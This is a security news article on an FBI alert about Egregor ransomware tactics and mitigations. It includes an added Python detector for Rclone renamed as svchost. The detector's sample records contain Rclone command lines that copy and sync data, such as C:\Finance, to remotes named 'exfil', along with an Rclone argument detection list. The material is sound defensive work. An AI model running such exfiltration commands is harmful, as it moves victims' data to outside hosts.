FBI Alert on Growing Egregor Ransomware Threat
January 11, 2021
The FBI issued a warning late last week over the growing threat from the operators behind the Egregor ransomware variant. The Egregor network claims to have compromised approximately 150 corporate networks in the U.S. and other countries, with extortion demands of up to $4 million.
Egregor is one of several operations that download data before locking victims out of the systems by encrypting their disks. They then extort the victim by threatening publication of the data.
- Windows machines are the target, especially those that are unpatched or running Windows 7 or lower.
- Sadly, phishing emails with malicious attachments or links are usually the initial attack vector, reinforcing that common-sense use of email is still the best frontline defense.
- Vulnerabilities in Microsoft's Remote Desktop Protocol (RDP) and in VPNs are exploited to gain initial access before moving laterally throughout the network.
- Data is exfiltrated from the targets using Rclone (or a similar tool) renamed to look like the standard Windows process "svchost".
- Once the data is stolen, the disks are then cryptographically locked.
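The masquerading described above (Rclone renamed to look like svchost) can be spotted from process-creation telemetry. The following is an added detection example, not code from the FBI alert or the article; it assumes Sysmon-style process-creation records with Image, OriginalFileName and CommandLine fields, and the sample records are constructed.

```python
"""Flag processes masquerading as svchost.exe, such as a renamed Rclone binary.

Added detection example, not code from the FBI alert. It scans process-creation
records shaped like Sysmon Event ID 1 (field names Image, OriginalFileName and
CommandLine are assumed) for three cheap tells of a renamed exfiltration tool.
"""
import ntpath

# Legitimate svchost.exe lives only in these directories (lower-cased).
EXPECTED_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Argument tokens typical of an Rclone transfer job to a cloud remote.
RCLONE_ARGS = {"copy", "sync", "move", "--config", "--transfers", "--ignore-existing"}

def check_event(event):
    """Return the reasons one process-creation event looks like renamed Rclone."""
    image = event["Image"]
    directory = ntpath.dirname(image).lower()
    name = ntpath.basename(image).lower()
    original = event.get("OriginalFileName", "").lower()
    tokens = set(event.get("CommandLine", "").lower().split())
    reasons = []
    # Tell 1: a file called svchost.exe running outside the Windows directories.
    if name == "svchost.exe" and directory not in EXPECTED_SVCHOST_DIRS:
        reasons.append(f"svchost.exe launched from unexpected path {directory}")
    # Tell 2: the PE version-info name disagrees with the on-disk file name
    # (renaming rclone.exe on disk does not change its OriginalFileName).
    if original and original != name:
        reasons.append(f"file name {name} does not match OriginalFileName {original}")
    # Tell 3: Rclone-style transfer arguments on a binary that is not rclone.exe.
    if name != "rclone.exe" and len(tokens & RCLONE_ARGS) >= 2:
        reasons.append("Rclone-style arguments: " + " ".join(sorted(tokens & RCLONE_ARGS)))
    return reasons

def scan(events):
    """Map each flagged image path to its reasons; clean events are omitted."""
    return {e["Image"]: r for e in events if (r := check_event(e))}

# Constructed sample records: one legitimate service host, two renamed Rclone runs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Users\Public\svchost.exe copy C:\Finance exfil:share --transfers 8 --config C:\Users\Public\r.conf"},
    {"Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "",
     "CommandLine": r"C:\ProgramData\svchost.exe sync D:\Shares out:backup --ignore-existing"},
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(reasons))
```

The second tell relies on version information that a careless rename leaves intact; the third catches the case where the attacker stripped it, which is why the checks are combined rather than used alone.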
Scott Ferguson at GovInfoSecurity.com reports:
"There are a couple of unusual things about Egregor," says Brett Callow, a threat analyst at security firm Emsisoft. "First, it can spit out the ransom note on any connected printer, which seems like a somewhat odd move as it often results in incidents quickly becoming public knowledge, meaning companies no longer have the incentive to pay quickly and quietly to avoid publicity.
"Secondly, the group initially racked up victims at an unprecedented rate. This is probably because multiple threat actors joined Egregor's affiliate program after the Maze group ended its operation, taking with them details of compromised networks that had yet to be exploited."
FBI Recommended Mitigation
Organizations can take several steps to mitigate the risk of Egregor and other ransomware attacks, including:
- Backing up critical data offline;
- Ensuring that copies of critical data are in the cloud or on an external hard drive or storage device;
- Securing backups and ensuring data is not accessible for modification or deletion from the system where the data resides;
- Using two-factor authentication;
- Prioritizing patching of public-facing remote access products and applications, including recent RDP vulnerabilities such as CVE-2020-0609, CVE-2020-0610 and CVE-2020-16896;
- Reviewing suspicious BAT and DLL files with recon data and exfiltration tools.
License: Creative Commons Attribution 4.0 International (CC BY 4.0)